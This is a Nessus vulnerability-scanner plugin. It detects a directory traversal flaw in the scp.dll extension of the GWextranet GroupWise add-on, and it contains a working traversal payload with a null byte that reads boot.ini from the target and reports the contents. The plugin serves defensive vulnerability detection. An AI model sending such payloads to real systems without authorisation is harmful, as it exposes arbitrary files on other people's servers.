#
#  (C) Tenable Network Security, Inc.
#


 desc = "
Synopsis :

The remote web server contains a web service extension that is prone
to a directory traversal attack. 

Description :

The remote host is running GWextranet, an add-on for GroupWise for
publishing via the web GroupWise calendar and folder information. 

The version of GWextranet installed on the remote host fails to
sanitize user-supplied input to the 'template' parameter of the
'scp.dll' extension before using it to access files.  On a Windows
platform, an unauthenticated attacker can leverage this issue to read
the content of arbitrary files on the remote host, subject to the
privileges of the web server user id. 

See also :

http://www.securityfocus.com/archive/1/484039/30/0/threaded

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(28293);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(26525);

  script_name(english:"GWextranet template Parameter Directory Traversal Vulnerability");
  script_summary(english:"Tries to read boot.ini using GWextranet's scp.dll extension"); 
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/GWextranet", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  file = "../../../../../../../../../../../../boot.ini";

  req = http_get(
    item:string(
      dir, "/scp.dll/sendto?",
      "template=", file, "%00", SCRIPT_NAME
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if it looks like we were successful.  
  if ("[boot loader]" >< res)
  {
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the contents of the file '\\boot.ini' that Nessus was able to\n",
      "read from the remote host :\n",
      "\n",
      res
    );
    security_warning(port:port, data:report);
  }
}
